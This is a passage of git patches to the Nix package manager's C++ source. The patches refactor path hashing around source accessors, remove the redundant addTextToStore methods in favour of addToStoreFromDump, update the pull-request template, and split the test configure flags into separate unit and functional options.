nix { + +/** + * An enumeration of the main ways we can serialize file system + * objects. + */ +enum struct FileIngestionMethod : uint8_t { + /** + * Flat-file hashing. Directly ingest the contents of a single file + */ + Flat = 0, + /** + * Recursive (or NAR) hashing. Serializes the file-system object in + * Nix Archive format and ingest that. + */ + Recursive = 1, +}; + +/** + * Dump a serialization of the given file system object. 
+ */ +void dumpPath( + SourceAccessor & accessor, const CanonPath & path, + Sink & sink, + FileIngestionMethod method, + PathFilter & filter = defaultPathFilter); + +/** + * Restore a serialization of the given file system object. + * + * @TODO use an arbitrary `ParseSink`. + */ +void restorePath( + const Path & path, + Source & source, + FileIngestionMethod method); + +/** + * Compute the hash of the given file system object according to the + * given method. + * + * The hash is defined as (essentially) hashString(ht, dumpPath(path)). + */ +HashResult hashPath( + SourceAccessor & accessor, const CanonPath & path, + FileIngestionMethod method, HashAlgorithm ht, + PathFilter & filter = defaultPathFilter); + +} diff --git a/src/libutil/hash.cc b/src/libutil/hash.cc index 30456ae5c..502afbda2 100644 --- a/src/libutil/hash.cc +++ b/src/libutil/hash.cc @@ -367,15 +367,6 @@ HashResult HashSink::currentHash() } -HashResult hashPath( - HashAlgorithm ha, const Path & path, PathFilter & filter) -{ - HashSink sink(ha); - dumpPath(path, sink, filter); - return sink.finish(); -} - - Hash compressHash(const Hash & hash, unsigned int newSize) { Hash h(hash.algo); diff --git a/src/libutil/hash.hh b/src/libutil/hash.hh index 7bed9e2bd..2fe9a53f5 100644 --- a/src/libutil/hash.hh +++ b/src/libutil/hash.hh @@ -168,14 +168,11 @@ Hash hashString(HashAlgorithm ha, std::string_view s); Hash hashFile(HashAlgorithm ha, const Path & path); /** - * Compute the hash of the given path, serializing as a Nix Archive and - * then hashing that. + * The final hash and the number of bytes digested. * - * The hash is defined as (essentially) hashString(ht, dumpPath(path)). 
+ * @todo Convert to proper struct */ typedef std::pair HashResult; -HashResult hashPath(HashAlgorithm ha, const Path & path, - PathFilter & filter = defaultPathFilter); /** * Compress a hash to the specified number of bytes by cyclically diff --git a/src/nix-store/nix-store.cc b/src/nix-store/nix-store.cc index d361dc0ac..0a0a3ab1a 100644 --- a/src/nix-store/nix-store.cc +++ b/src/nix-store/nix-store.cc @@ -13,6 +13,7 @@ #include "shared.hh" #include "graphml.hh" #include "legacy.hh" +#include "posix-source-accessor.hh" #include "path-with-outputs.hh" #include "posix-fs-canonicalise.hh" @@ -175,8 +176,12 @@ static void opAdd(Strings opFlags, Strings opArgs) { if (!opFlags.empty()) throw UsageError("unknown flag"); + PosixSourceAccessor accessor; for (auto & i : opArgs) - cout << fmt("%s\n", store->printStorePath(store->addToStore(std::string(baseNameOf(i)), i))); + cout << fmt("%s\n", store->printStorePath(store->addToStore( + std::string(baseNameOf(i)), + accessor, + CanonPath::fromCwd(i)))); } @@ -196,8 +201,14 @@ static void opAddFixed(Strings opFlags, Strings opArgs) HashAlgorithm hashAlgo = parseHashAlgo(opArgs.front()); opArgs.pop_front(); + PosixSourceAccessor accessor; for (auto & i : opArgs) - std::cout << fmt("%s\n", store->printStorePath(store->addToStoreSlow(baseNameOf(i), i, method, hashAlgo).path)); + std::cout << fmt("%s\n", store->printStorePath(store->addToStoreSlow( + baseNameOf(i), + accessor, + CanonPath::fromCwd(i), + method, + hashAlgo).path)); } @@ -541,7 +552,10 @@ static void registerValidity(bool reregister, bool hashGiven, bool canonicalise) if (canonicalise) canonicalisePathMetaData(store->printStorePath(info->path), {}); if (!hashGiven) { - HashResult hash = hashPath(HashAlgorithm::SHA256, store->printStorePath(info->path)); + HashResult hash = hashPath( + *store->getFSAccessor(false), CanonPath { store->printStorePath(info->path) }, + + FileIngestionMethod::Recursive, HashAlgorithm::SHA256); info->narHash = hash.first; info->narSize = 
hash.second; } diff --git a/src/nix/add-to-store.cc b/src/nix/add-to-store.cc index 02de796b5..64a43ecfa 100644 --- a/src/nix/add-to-store.cc +++ b/src/nix/add-to-store.cc @@ -2,6 +2,7 @@ #include "common-args.hh" #include "store-api.hh" #include "archive.hh" +#include "posix-source-accessor.hh" using namespace nix; @@ -20,7 +21,7 @@ struct CmdAddToStore : MixDryRun, StoreCommand { Path path; std::optional namePart; - FileIngestionMethod ingestionMethod = FileIngestionMethod::Recursive; + ContentAddressMethod caMethod = FileIngestionMethod::Recursive; CmdAddToStore() { @@ -48,7 +49,7 @@ struct CmdAddToStore : MixDryRun, StoreCommand )", .labels = {"hash-mode"}, .handler = {[this](std::string s) { - this->ingestionMethod = parseIngestionMethod(s); + this->caMethod = parseIngestionMethod(s); }}, }); } @@ -57,36 +58,17 @@ struct CmdAddToStore : MixDryRun, StoreCommand { if (!namePart) namePart = baseNameOf(path); - StringSink sink; - dumpPath(path, sink); + PosixSourceAccessor accessor; - auto narHash = hashString(HashAlgorithm::SHA256, sink.s); + auto path2 = CanonPath::fromCwd(path); - Hash hash = narHash; - if (ingestionMethod == FileIngestionMethod::Flat) { - HashSink hsink(HashAlgorithm::SHA256); - readFile(path, hsink); - hash = hsink.finish().first; - } + auto storePath = dryRun + ? 
store->computeStorePath( + *namePart, accessor, path2, caMethod, HashAlgorithm::SHA256, {}).first + : store->addToStoreSlow( + *namePart, accessor, path2, caMethod, HashAlgorithm::SHA256, {}).path; - ValidPathInfo info { - *store, - std::move(*namePart), - FixedOutputInfo { - .method = std::move(ingestionMethod), - .hash = std::move(hash), - .references = {}, - }, - narHash, - }; - info.narSize = sink.s.size(); - - if (!dryRun) { - auto source = StringSource(sink.s); - store->addToStore(info, source); - } - - logger->cout("%s", store->printStorePath(info.path)); + logger->cout("%s", store->printStorePath(storePath)); } }; @@ -110,7 +92,7 @@ struct CmdAddFile : CmdAddToStore { CmdAddFile() { - ingestionMethod = FileIngestionMethod::Flat; + caMethod = FileIngestionMethod::Flat; } std::string description() override diff --git a/src/nix/hash.cc b/src/nix/hash.cc index 0bba3b7d2..83694306e 100644 --- a/src/nix/hash.cc +++ b/src/nix/hash.cc @@ -5,6 +5,7 @@ #include "shared.hh" #include "references.hh" #include "archive.hh" +#include "posix-source-accessor.hh" using namespace nix; @@ -88,14 +89,8 @@ struct CmdHashBase : Command else hashSink = std::make_unique(ha); - switch (mode) { - case FileIngestionMethod::Flat: - readFile(path, *hashSink); - break; - case FileIngestionMethod::Recursive: - dumpPath(path, *hashSink); - break; - } + PosixSourceAccessor accessor; + dumpPath(accessor, CanonPath::fromCwd(path), *hashSink, mode); Hash h = hashSink->finish().first; if (truncate && h.hashSize > 20) h = compressHash(h, 20); diff --git a/src/nix/prefetch.cc b/src/nix/prefetch.cc index bbfeb8aa4..b5d619006 100644 --- a/src/nix/prefetch.cc +++ b/src/nix/prefetch.cc @@ -9,6 +9,7 @@ #include "attr-path.hh" #include "eval-inline.hh" #include "legacy.hh" +#include "posix-source-accessor.hh" #include @@ -122,7 +123,11 @@ std::tuple prefetchFile( Activity act(*logger, lvlChatty, actUnknown, fmt("adding '%s' to the store", url)); - auto info = store->addToStoreSlow(*name, tmpFile, 
ingestionMethod, hashAlgo, expectedHash); + PosixSourceAccessor accessor; + auto info = store->addToStoreSlow( + *name, + accessor, CanonPath::fromCwd(tmpFile), + ingestionMethod, hashAlgo, {}, expectedHash); storePath = info.path; assert(info.ca); hash = info.ca->hash; diff --git a/tests/unit/libexpr/primops.cc b/tests/unit/libexpr/primops.cc index 31b1b49ae..6d7649b3c 100644 --- a/tests/unit/libexpr/primops.cc +++ b/tests/unit/libexpr/primops.cc @@ -604,7 +604,7 @@ namespace nix { ASSERT_THAT(v, IsStringEq("401b09eab3c013d4ca54922bb802bec8fd5318192b0a75f201d8b3727429080fb337591abd3e44453b954555b7a0812e1081c39b740293f765eae731f5a65ed1")); } - TEST_F(PrimOpTest, hashStringInvalidHashType) { + TEST_F(PrimOpTest, hashStringInvalidHashAlgorithm) { ASSERT_THROW(eval("builtins.hashString \"foobar\" \"asdf\""), Error); } From ed26b186fbed9e5f8df2453a5b1aec0c18b11401 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 8 Nov 2023 21:11:48 -0500 Subject: [PATCH 136/654] Remove now-redundant text-hashing store methods `addTextToStore` and `computeStorePathFromDump` are now redundant. 
Co-authored-by: Robert Hensing --- src/libexpr/primops.cc | 10 ++- src/libstore/binary-cache-store.cc | 71 +++++++++++---------- src/libstore/binary-cache-store.hh | 6 -- src/libstore/build/local-derivation-goal.cc | 11 ---- src/libstore/content-address.hh | 8 +-- src/libstore/daemon.cc | 5 +- src/libstore/derivations.cc | 10 ++- src/libstore/dummy-store.cc | 7 -- src/libstore/legacy-ssh-store.hh | 7 -- src/libstore/local-store.cc | 52 --------------- src/libstore/local-store.hh | 6 -- src/libstore/remote-store.cc | 10 --- src/libstore/remote-store.hh | 6 -- src/libstore/store-api.cc | 34 +++------- src/libstore/store-api.hh | 10 --- src/libstore/store-dir-config.hh | 23 ------- src/nix-env/user-env.cc | 13 ++-- src/nix/develop.cc | 6 +- 18 files changed, 83 insertions(+), 212 deletions(-) diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index 75ee1e38d..8b689f0c8 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -2072,8 +2072,14 @@ static void prim_toFile(EvalState & state, const PosIdx pos, Value * * args, Val } auto storePath = settings.readOnlyMode - ? state.store->computeStorePathForText(name, contents, refs) - : state.store->addTextToStore(name, contents, refs, state.repair); + ? 
state.store->makeFixedOutputPathFromCA(name, TextInfo { + .hash = hashString(HashAlgorithm::SHA256, contents), + .references = std::move(refs), + }) + : ({ + StringSource s { contents }; + state.store->addToStoreFromDump(s, name, TextIngestionMethod {}, HashAlgorithm::SHA256, refs, state.repair); + }); /* Note: we don't need to add `context' to the context of the result, since `storePath' itself has references to the paths diff --git a/src/libstore/binary-cache-store.cc b/src/libstore/binary-cache-store.cc index 19aa283fc..8a3052433 100644 --- a/src/libstore/binary-cache-store.cc +++ b/src/libstore/binary-cache-store.cc @@ -12,6 +12,7 @@ #include "thread-pool.hh" #include "callback.hh" #include "signals.hh" +#include "archive.hh" #include #include @@ -308,15 +309,47 @@ StorePath BinaryCacheStore::addToStoreFromDump( const StorePathSet & references, RepairFlag repair) { - if (method != FileIngestionMethod::Recursive || hashAlgo != HashAlgorithm::SHA256) - unsupported("addToStoreFromDump"); - return addToStoreCommon(dump, repair, CheckSigs, [&](HashResult nar) { + std::optional caHash; + std::string nar; + + if (auto * dump2p = dynamic_cast(&dump)) { + auto & dump2 = *dump2p; + // Hack, this gives us a "replayable" source so we can compute + // multiple hashes more easily. + caHash = hashString(HashAlgorithm::SHA256, dump2.s); + switch (method.getFileIngestionMethod()) { + case FileIngestionMethod::Recursive: + // The dump is already NAR in this case, just use it. + nar = dump2.s; + break; + case FileIngestionMethod::Flat: + // The dump is Flat, so we need to convert it to NAR with a + // single file. + StringSink s; + dumpString(dump2.s, s); + nar = std::move(s.s); + break; + } + } else { + // Otherwise, we have to do th same hashing as NAR so our single + // hash will suffice for both purposes. 
+ if (method != FileIngestionMethod::Recursive || hashAlgo != HashAlgorithm::SHA256) + unsupported("addToStoreFromDump"); + } + StringSource narDump { nar }; + + // Use `narDump` if we wrote to `nar`. + Source & narDump2 = nar.size() > 0 + ? static_cast(narDump) + : dump; + + return addToStoreCommon(narDump2, repair, CheckSigs, [&](HashResult nar) { ValidPathInfo info { *this, name, ContentAddressWithReferences::fromParts( method, - nar.first, + caHash ? *caHash : nar.first, { .others = references, // caller is not capable of creating a self-reference, because this is content-addressed without modulus @@ -440,36 +473,6 @@ StorePath BinaryCacheStore::addToStore( })->path; } -StorePath BinaryCacheStore::addTextToStore( - std::string_view name, - std::string_view s, - const StorePathSet & references, - RepairFlag repair) -{ - auto textHash = hashString(HashAlgorithm::SHA256, s); - auto path = makeTextPath(name, TextInfo { { textHash }, references }); - - if (!repair && isValidPath(path)) - return path; - - StringSink sink; - dumpString(s, sink); - StringSource source(sink.s); - return addToStoreCommon(source, repair, CheckSigs, [&](HashResult nar) { - ValidPathInfo info { - *this, - std::string { name }, - TextInfo { - .hash = textHash, - .references = references, - }, - nar.first, - }; - info.narSize = nar.second; - return info; - })->path; -} - void BinaryCacheStore::queryRealisationUncached(const DrvOutput & id, Callback> callback) noexcept { diff --git a/src/libstore/binary-cache-store.hh b/src/libstore/binary-cache-store.hh index dbe4ac180..98e43ee6a 100644 --- a/src/libstore/binary-cache-store.hh +++ b/src/libstore/binary-cache-store.hh @@ -141,12 +141,6 @@ public: PathFilter & filter, RepairFlag repair) override; - StorePath addTextToStore( - std::string_view name, - std::string_view s, - const StorePathSet & references, - RepairFlag repair) override; - void registerDrvOutput(const Realisation & info) override; void queryRealisationUncached(const DrvOutput &, 
diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc index e4828dd2f..b01d9e237 100644 --- a/src/libstore/build/local-derivation-goal.cc +++ b/src/libstore/build/local-derivation-goal.cc @@ -1308,17 +1308,6 @@ struct RestrictedStore : public virtual RestrictedStoreConfig, public virtual In goal.addDependency(info.path); } - StorePath addTextToStore( - std::string_view name, - std::string_view s, - const StorePathSet & references, - RepairFlag repair = NoRepair) override - { - auto path = next->addTextToStore(name, s, references, repair); - goal.addDependency(path); - return path; - } - StorePath addToStoreFromDump( Source & dump, std::string_view name, diff --git a/src/libstore/content-address.hh b/src/libstore/content-address.hh index 6863ad260..f0973412b 100644 --- a/src/libstore/content-address.hh +++ b/src/libstore/content-address.hh @@ -109,11 +109,11 @@ struct ContentAddressMethod * serialisation methods (flat file vs NAR). Thus, ‘ca’ has one of the * following forms: * - * - ‘text:sha256:’: For paths - * computed by Store::makeTextPath() / Store::addTextToStore(). + * - `TextIngestionMethod`: + * ‘text:sha256:’ * - * - ‘fixed:::’: For paths computed by - * Store::makeFixedOutputPath() / Store::addToStore(). 
+ * - `FixedIngestionMethod`: + * ‘fixed:::’ */ struct ContentAddress { diff --git a/src/libstore/daemon.cc b/src/libstore/daemon.cc index 574263c68..923ea6447 100644 --- a/src/libstore/daemon.cc +++ b/src/libstore/daemon.cc @@ -483,7 +483,10 @@ static void performOp(TunnelLogger * logger, ref store, std::string s = readString(from); auto refs = WorkerProto::Serialise::read(*store, rconn); logger->startWork(); - auto path = store->addTextToStore(suffix, s, refs, NoRepair); + auto path = ({ + StringSource source { s }; + store->addToStoreFromDump(source, suffix, TextIngestionMethod {}, HashAlgorithm::SHA256, refs, NoRepair); + }); logger->stopWork(); to << store->printStorePath(path); break; diff --git a/src/libstore/derivations.cc b/src/libstore/derivations.cc index c35150b57..8a7d660ff 100644 --- a/src/libstore/derivations.cc +++ b/src/libstore/derivations.cc @@ -143,8 +143,14 @@ StorePath writeDerivation(Store & store, auto suffix = std::string(drv.name) + drvExtension; auto contents = drv.unparse(store, false); return readOnly || settings.readOnlyMode - ? store.computeStorePathForText(suffix, contents, references) - : store.addTextToStore(suffix, contents, references, repair); + ? 
store.makeFixedOutputPathFromCA(suffix, TextInfo { + .hash = hashString(HashAlgorithm::SHA256, contents), + .references = std::move(references), + }) + : ({ + StringSource s { contents }; + store.addToStoreFromDump(s, suffix, TextIngestionMethod {}, HashAlgorithm::SHA256, references, repair); + }); } diff --git a/src/libstore/dummy-store.cc b/src/libstore/dummy-store.cc index 821cda399..f52a309d1 100644 --- a/src/libstore/dummy-store.cc +++ b/src/libstore/dummy-store.cc @@ -58,13 +58,6 @@ struct DummyStore : public virtual DummyStoreConfig, public virtual Store RepairFlag repair, CheckSigsFlag checkSigs) override { unsupported("addToStore"); } - StorePath addTextToStore( - std::string_view name, - std::string_view s, - const StorePathSet & references, - RepairFlag repair) override - { unsupported("addTextToStore"); } - void narFromPath(const StorePath & path, Sink & sink) override { unsupported("narFromPath"); } diff --git a/src/libstore/legacy-ssh-store.hh b/src/libstore/legacy-ssh-store.hh index 8b142ba2a..c5a3ce677 100644 --- a/src/libstore/legacy-ssh-store.hh +++ b/src/libstore/legacy-ssh-store.hh @@ -69,13 +69,6 @@ struct LegacySSHStore : public virtual LegacySSHStoreConfig, public virtual Stor RepairFlag repair) override { unsupported("addToStore"); } - StorePath addTextToStore( - std::string_view name, - std::string_view s, - const StorePathSet & references, - RepairFlag repair) override - { unsupported("addTextToStore"); } - private: void putBuildSettings(Connection & conn); diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc index cd8bf24f8..df1de7752 100644 --- a/src/libstore/local-store.cc +++ b/src/libstore/local-store.cc @@ -1257,58 +1257,6 @@ StorePath LocalStore::addToStoreFromDump( } -StorePath LocalStore::addTextToStore( - std::string_view name, - std::string_view s, - const StorePathSet & references, RepairFlag repair) -{ - auto hash = hashString(HashAlgorithm::SHA256, s); - auto dstPath = makeTextPath(name, TextInfo { - .hash = 
hash, - .references = references, - }); - - addTempRoot(dstPath); - - if (repair || !isValidPath(dstPath)) { - - auto realPath = Store::toRealPath(dstPath); - - PathLocks outputLock({realPath}); - - if (repair || !isValidPath(dstPath)) { - - deletePath(realPath); - - autoGC(); - - writeFile(realPath, s); - - canonicalisePathMetaData(realPath, {}); - - StringSink sink; - dumpString(s, sink); - auto narHash = hashString(HashAlgorithm::SHA256, sink.s); - - optimisePath(realPath, repair); - - ValidPathInfo info { dstPath, narHash }; - info.narSize = sink.s.size(); - info.references = references; - info.ca = { - .method = TextIngestionMethod {}, - .hash = hash, - }; - registerValidPath(info); - } - - outputLock.setDeletion(true); - } - - return dstPath; -} - - /* Create a temporary directory in the store that won't be garbage-collected until the returned FD is closed. */ std::pair LocalStore::createTempDirInStore() diff --git a/src/libstore/local-store.hh b/src/libstore/local-store.hh index a8323fe5a..ba56d3ead 100644 --- a/src/libstore/local-store.hh +++ b/src/libstore/local-store.hh @@ -185,12 +185,6 @@ public: const StorePathSet & references, RepairFlag repair) override; - StorePath addTextToStore( - std::string_view name, - std::string_view s, - const StorePathSet & references, - RepairFlag repair) override; - void addTempRoot(const StorePath & path) override; private: diff --git a/src/libstore/remote-store.cc b/src/libstore/remote-store.cc index 567776b67..4d0113594 100644 --- a/src/libstore/remote-store.cc +++ b/src/libstore/remote-store.cc @@ -608,16 +608,6 @@ void RemoteStore::addMultipleToStore( } -StorePath RemoteStore::addTextToStore( - std::string_view name, - std::string_view s, - const StorePathSet & references, - RepairFlag repair) -{ - StringSource source(s); - return addCAToStore(source, name, TextIngestionMethod {}, HashAlgorithm::SHA256, references, repair)->path; -} - void RemoteStore::registerDrvOutput(const Realisation & info) { auto 
conn(getConnection()); diff --git a/src/libstore/remote-store.hh b/src/libstore/remote-store.hh index 68824a737..87704985b 100644 --- a/src/libstore/remote-store.hh +++ b/src/libstore/remote-store.hh @@ -106,12 +106,6 @@ public: RepairFlag repair, CheckSigsFlag checkSigs) override; - StorePath addTextToStore( - std::string_view name, - std::string_view s, - const StorePathSet & references, - RepairFlag repair) override; - void registerDrvOutput(const Realisation & info) override; void queryRealisationUncached(const DrvOutput &, diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc index 5b4c6c765..c2516afb5 100644 --- a/src/libstore/store-api.cc +++ b/src/libstore/store-api.cc @@ -205,25 +205,19 @@ StorePath StoreDirConfig::makeFixedOutputPath(std::string_view name, const Fixed } -StorePath StoreDirConfig::makeTextPath(std::string_view name, const TextInfo & info) const -{ - assert(info.hash.algo == HashAlgorithm::SHA256); - return makeStorePath( - makeType(*this, "text", StoreReferences { - .others = info.references, - .self = false, - }), - info.hash, - name); -} - - StorePath StoreDirConfig::makeFixedOutputPathFromCA(std::string_view name, const ContentAddressWithReferences & ca) const { // New template return std::visit(overloaded { [&](const TextInfo & ti) { - return makeTextPath(name, ti); + assert(ti.hash.algo == HashAlgorithm::SHA256); + return makeStorePath( + makeType(*this, "text", StoreReferences { + .others = ti.references, + .self = false, + }), + ti.hash, + name); }, [&](const FixedOutputInfo & foi) { return makeFixedOutputPath(name, foi); @@ -257,18 +251,6 @@ std::pair StoreDirConfig::computeStorePath( } -StorePath StoreDirConfig::computeStorePathForText( - std::string_view name, - std::string_view s, - const StorePathSet & references) const -{ - return makeTextPath(name, TextInfo { - .hash = hashString(HashAlgorithm::SHA256, s), - .references = references, - }); -} - - StorePath Store::addToStore( std::string_view name, SourceAccessor 
& accessor, diff --git a/src/libstore/store-api.hh b/src/libstore/store-api.hh index fc0a82a73..96a7ebd7b 100644 --- a/src/libstore/store-api.hh +++ b/src/libstore/store-api.hh @@ -468,16 +468,6 @@ public: RepairFlag repair = NoRepair) { unsupported("addToStoreFromDump"); } - /** - * Like addToStore, but the contents written to the output path is a - * regular file containing the given string. - */ - virtual StorePath addTextToStore( - std::string_view name, - std::string_view s, - const StorePathSet & references, - RepairFlag repair = NoRepair) = 0; - /** * Add a mapping indicating that `deriver!outputName` maps to the output path * `output`. diff --git a/src/libstore/store-dir-config.hh b/src/libstore/store-dir-config.hh index 0fc8ded9c..7ca8c2665 100644 --- a/src/libstore/store-dir-config.hh +++ b/src/libstore/store-dir-config.hh @@ -86,8 +86,6 @@ struct StoreDirConfig : public Config StorePath makeFixedOutputPath(std::string_view name, const FixedOutputInfo & info) const; - StorePath makeTextPath(std::string_view name, const TextInfo & info) const; - StorePath makeFixedOutputPathFromCA(std::string_view name, const ContentAddressWithReferences & ca) const; /** @@ -102,27 +100,6 @@ struct StoreDirConfig : public Config HashAlgorithm hashAlgo = HashAlgorithm::SHA256, const StorePathSet & references = {}, PathFilter & filter = defaultPathFilter) const; - - /** - * Preparatory part of addTextToStore(). - * - * !!! Computation of the path should take the references given to - * addTextToStore() into account, otherwise we have a (relatively - * minor) security hole: a caller can register a source file with - * bogus references. If there are too many references, the path may - * not be garbage collected when it has to be (not really a problem, - * the caller could create a root anyway), or it may be garbage - * collected when it shouldn't be (more serious). 
- * - * Hashing the references would solve this (bogus references would - * simply yield a different store path, so other users wouldn't be - * affected), but it has some backwards compatibility issues (the - * hashing scheme changes), so I'm not doing that for now. - */ - StorePath computeStorePathForText( - std::string_view name, - std::string_view s, - const StorePathSet & references) const; }; } diff --git a/src/nix-env/user-env.cc b/src/nix-env/user-env.cc index 34f6bd005..5d01fbf10 100644 --- a/src/nix-env/user-env.cc +++ b/src/nix-env/user-env.cc @@ -104,10 +104,15 @@ bool createUserEnv(EvalState & state, DrvInfos & elems, /* Also write a copy of the list of user environment elements to the store; we need it for future modifications of the environment. */ - std::ostringstream str; - manifest.print(state.symbols, str, true); - auto manifestFile = state.store->addTextToStore("env-manifest.nix", - str.str(), references); + auto manifestFile = ({ + std::ostringstream str; + manifest.print(state.symbols, str, true); + // TODO with C++20 we can use str.view() instead and avoid copy. + std::string str2 = str.str(); + StringSource source { str2 }; + state.store->addToStoreFromDump( + source, "env-manifest.nix", TextIngestionMethod {}, HashAlgorithm::SHA256, references); + }); /* Get the environment builder expression. 
*/ Value envBuilder; diff --git a/src/nix/develop.cc b/src/nix/develop.cc index 606b044b0..8db2de491 100644 --- a/src/nix/develop.cc +++ b/src/nix/develop.cc @@ -223,7 +223,11 @@ static StorePath getDerivationEnvironment(ref store, ref evalStore if (builder != "bash") throw Error("'nix develop' only works on derivations that use 'bash' as their builder"); - auto getEnvShPath = evalStore->addTextToStore("get-env.sh", getEnvSh, {}); + auto getEnvShPath = ({ + StringSource source { getEnvSh }; + evalStore->addToStoreFromDump( + source, "get-env.sh", TextIngestionMethod {}, HashAlgorithm::SHA256, {}); + }); drv.args = {store->printStorePath(getEnvShPath)}; From b1c559eabccc8890c74f4e520b89e800f6e7ef7e Mon Sep 17 00:00:00 2001 From: tomberek Date: Mon, 18 Dec 2023 10:45:57 -0500 Subject: [PATCH 137/654] docs: add link to project board to PRs (#9630) * docs: add link to project board to PRs * Update .github/PULL_REQUEST_TEMPLATE.md Co-authored-by: Valentin Gagarin * fix wording * add note on the process --------- Co-authored-by: Valentin Gagarin --- .github/PULL_REQUEST_TEMPLATE.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/.github/PULL_REQUEST_TEMPLATE.md b/.github/PULL_REQUEST_TEMPLATE.md index 217b19108..d12a4d36c 100644 --- a/.github/PULL_REQUEST_TEMPLATE.md +++ b/.github/PULL_REQUEST_TEMPLATE.md @@ -10,6 +10,8 @@ -# Priorities +# Priorities and Process Add :+1: to [pull requests you find important](https://github.com/NixOS/nix/pulls?q=is%3Aopen+sort%3Areactions-%2B1-desc). + +The Nix maintainer team uses a [GitHub project board](https://github.com/orgs/NixOS/projects/19) to [schedule and track reviews](https://github.com/NixOS/nix/tree/master/maintainers#project-board-protocol). 
From 7feabf7d44c960563350a246358d4e36bd598d60 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Thu, 14 Dec 2023 00:05:03 -0500 Subject: [PATCH 138/654] Split `--disable-tests`, fix cross builds It might seem obnoxious to have yet more configure flags, but I found controlling both the unit and functional tests with one flag was quite confusing because they are so different: - unit tests depending on building, functional tests don't (e.g. when we test already-built Nix) - unit tests can be installed, functional tests cannot - unit tests neeed extra libraries (GTest, RapidCheck), functional tests need extra executables (jq). - unit tests are run by `make check`, functional tests are run by `make installcheck` Really on a technical level, they seem wholly independent. Only on a human level ("they are both are tests") do they have anything in common. I had messed up the logic in cross builds because of this. Now I split the flag in two (and cleaned up a few other inconsistencies), and the logic fixed itself. Co-Authored-By: Robert Hensing --- Makefile | 30 ++++++-- Makefile.config.in | 7 +- configure.ac | 43 ++++++++---- doc/internal-api/local.mk | 14 +--- doc/manual/local.mk | 6 +- doc/manual/src/contributing/hacking.md | 5 +- .../src/installation/prerequisites-source.md | 2 +- mk/disable-tests.mk | 12 ---- package.nix | 69 ++++++++----------- 9 files changed, 93 insertions(+), 95 deletions(-) delete mode 100644 mk/disable-tests.mk diff --git a/Makefile b/Makefile index 3dae8b394..c62216df8 100644 --- a/Makefile +++ b/Makefile @@ -24,7 +24,7 @@ makefiles = \ misc/upstart/local.mk endif -ifeq ($(ENABLE_BUILD)_$(ENABLE_TESTS), yes_yes) +ifeq ($(ENABLE_UNIT_TESTS), yes) makefiles += \ tests/unit/libutil/local.mk \ tests/unit/libutil-support/local.mk \ @@ -32,9 +32,14 @@ makefiles += \ tests/unit/libstore-support/local.mk \ tests/unit/libexpr/local.mk \ tests/unit/libexpr-support/local.mk +else +.PHONY: check +check: + @echo "Unit tests are disabled. 
Configure without '--disable-unit-tests', or avoid calling 'make check'." + @exit 1 endif -ifeq ($(ENABLE_TESTS), yes) +ifeq ($(ENABLE_FUNCTIONAL_TESTS), yes) makefiles += \ tests/functional/local.mk \ tests/functional/ca/local.mk \ @@ -42,8 +47,10 @@ makefiles += \ tests/functional/test-libstoreconsumer/local.mk \ tests/functional/plugins/local.mk else -makefiles += \ - mk/disable-tests.mk +.PHONY: installcheck +installcheck: + @echo "Functional tests are disabled. Configure without '--disable-functional-tests', or avoid calling 'make installcheck'." + @exit 1 endif OPTIMIZE = 1 @@ -59,9 +66,22 @@ include mk/lib.mk # Must be included after `mk/lib.mk` so rules refer to variables defined # by the library. Rules are not "lazy" like variables, unfortunately. -ifeq ($(ENABLE_BUILD), yes) +ifeq ($(ENABLE_DOC_GEN),yes) $(eval $(call include-sub-makefile, doc/manual/local.mk)) +else +.PHONY: manual-html manpages +manual-html manpages: + @echo "Generated docs are disabled. Configure without '--disable-doc-gen', or avoid calling 'make manpages' and 'make manual-html'." + @exit 1 endif + +ifeq ($(ENABLE_INTERNAL_API_DOCS),yes) $(eval $(call include-sub-makefile, doc/internal-api/local.mk)) +else +.PHONY: internal-api-html +internal-api-html: + @echo "Internal API docs are disabled. Configure with '--enable-internal-api-docs', or avoid calling 'make internal-api-html'." 
+ @exit 1 +endif GLOBAL_CXXFLAGS += -g -Wall -include $(buildprefix)config.h -std=c++2a -I src diff --git a/Makefile.config.in b/Makefile.config.in index c85e028c2..21a9f41ec 100644 --- a/Makefile.config.in +++ b/Makefile.config.in @@ -9,8 +9,11 @@ CXXFLAGS = @CXXFLAGS@ CXXLTO = @CXXLTO@ EDITLINE_LIBS = @EDITLINE_LIBS@ ENABLE_BUILD = @ENABLE_BUILD@ +ENABLE_DOC_GEN = @ENABLE_DOC_GEN@ +ENABLE_FUNCTIONAL_TESTS = @ENABLE_FUNCTIONAL_TESTS@ +ENABLE_INTERNAL_API_DOCS = @ENABLE_INTERNAL_API_DOCS@ ENABLE_S3 = @ENABLE_S3@ -ENABLE_TESTS = @ENABLE_TESTS@ +ENABLE_UNIT_TESTS = @ENABLE_UNIT_TESTS@ GTEST_LIBS = @GTEST_LIBS@ HAVE_LIBCPUID = @HAVE_LIBCPUID@ HAVE_SECCOMP = @HAVE_SECCOMP@ @@ -36,12 +39,10 @@ checkbindir = @checkbindir@ checklibdir = @checklibdir@ datadir = @datadir@ datarootdir = @datarootdir@ -doc_generate = @doc_generate@ docdir = @docdir@ embedded_sandbox_shell = @embedded_sandbox_shell@ exec_prefix = @exec_prefix@ includedir = @includedir@ -internal_api_docs = @internal_api_docs@ libdir = @libdir@ libexecdir = @libexecdir@ localstatedir = @localstatedir@ diff --git a/configure.ac b/configure.ac index a949f9df2..1bc4f17b0 100644 --- a/configure.ac +++ b/configure.ac @@ -138,20 +138,38 @@ AC_ARG_ENABLE(build, AS_HELP_STRING([--disable-build],[Do not build nix]), ENABLE_BUILD=$enableval, ENABLE_BUILD=yes) AC_SUBST(ENABLE_BUILD) -# Building without tests is useful for bootstrapping with a smaller footprint +# Building without unit tests is useful for bootstrapping with a smaller footprint # or running the tests in a separate derivation. Otherwise, we do compile and # run them. -AC_ARG_ENABLE(tests, AS_HELP_STRING([--disable-tests],[Do not build the tests]), - ENABLE_TESTS=$enableval, ENABLE_TESTS=yes) -AC_SUBST(ENABLE_TESTS) -# Building without API docs is the default as Nix' C++ interfaces are internal and unstable. 
